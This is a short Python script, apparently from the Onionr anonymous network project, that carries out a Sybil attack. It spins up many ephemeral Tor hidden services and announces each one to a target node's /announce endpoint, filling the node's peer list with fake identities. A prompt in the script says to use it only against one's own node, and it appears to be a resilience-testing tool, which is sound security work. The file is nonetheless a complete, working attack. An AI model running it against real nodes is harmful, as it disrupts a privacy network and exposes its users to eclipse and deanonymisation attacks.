41 lines
1.1 KiB
Python
41 lines
1.1 KiB
Python
import sys
|
|
import os
|
|
import stem
|
|
|
|
if not os.path.exists('onionr.sh'):
|
|
os.chdir('../')
|
|
sys.path.append("src/")
|
|
from onionrutils import stringvalidators
|
|
from onionrutils import basicrequests
|
|
|
|
from stem.control import Controller
|
|
|
|
onionr_ip = input("onionr ip address: ")
|
|
onionr_port = int(input("Enter onionr public api port: "))
|
|
|
|
controller = Controller.from_port('127.0.0.1', int(input("Enter tor controller port: ")))
|
|
controller.authenticate()
|
|
|
|
node = input("Enter node to attack. Note that you legally must use your own, and even that might lead to technical or legal issues: ")
|
|
assert stringvalidators.validate_transport(node)
|
|
|
|
socks = input("Socks:")
|
|
|
|
adders = set([])
|
|
for i in range(int(input("Sybil addresses: "))):
|
|
response = controller.create_ephemeral_hidden_service({80: f'{onionr_ip}:{onionr_port}'}, await_publication=True)
|
|
#print(i, response.service_id)
|
|
adders.add(response.service_id)
|
|
|
|
|
|
for x in adders:
|
|
x += '.onion'
|
|
print(f"Introducing {x} to {node}")
|
|
basicrequests.do_post_request(
|
|
f'http://{node}/announce',
|
|
data = {'node': x},
|
|
port=socks)
|
|
|
|
|
|
|